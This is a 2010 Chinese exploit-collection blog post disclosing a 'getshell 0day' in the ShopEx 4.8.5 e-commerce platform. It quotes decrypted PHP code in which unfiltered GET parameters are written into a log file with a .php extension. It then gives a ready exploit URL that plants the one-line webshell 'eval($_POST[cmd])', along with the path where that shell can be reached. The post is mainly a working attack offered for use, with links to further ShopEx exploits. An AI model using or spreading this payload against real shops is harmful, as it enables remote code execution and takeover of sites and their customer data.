shopex 4.8.5.45144 getshell 囧版 0day

2010, June 14, 7:26 PM. oday收藏
Submitted by admin

by:俺是农村的
QQ:332876777

\core\include_v5\crontab.php zend加密后的,我只发布解密后的代码。

public function run( )
                {
                                $this->logFile = HOME_DIR."/logs/access.log.php";
                                $this->now = time( );
                                $this->viewStat( );
                                $messenger =& $this->loadModel( "system/messenger" );
                                $messenger->runQueue( );
                }

                public function viewStat( )
                {
                                if ( !file_exists( $this->logFile ) )
                                {
                                                file_put_contents( $this->logFile, "#<?php exit()?>\n" );   //囧之处!By:小翔
                                }
                                if ( isset( $_GET['action'] ) )
                                {
                                                error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile );//没有任何过滤,By:小翔
shopex 4.8.5.45144 getshell 0day  By:小翔
                                                 于:2010.06.09 00:40

 

 

俺是农村的,不才,不知道原理,只测试了几个站,发现linux的对php exit()不会退出,继续往下执行。于是漏洞产生了。
直接提交:http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在:http://127.0.0.1/shopex/home/logs/access.log.php
哪位牛牛研究出来,为什么linux下面php exit() 不退出,麻烦你告诉我。
Tags: shopex

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopex拿shell (浏览: 15539, 评论: 0)
shopex 注入 0day (4.8.5) (浏览: 10315, 评论: 0)
Shopex V4.8.4 V4.8.5 0Day 通杀+ 官方测试 (浏览: 16258, 评论: 0)
SHOPEX最新漏洞利用 (浏览: 10520, 评论: 0)
ShopEx PHP远程包含漏洞 (浏览: 10223, 评论: 0)
ShopEx 4.7.2 漏洞 (浏览: 13045, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):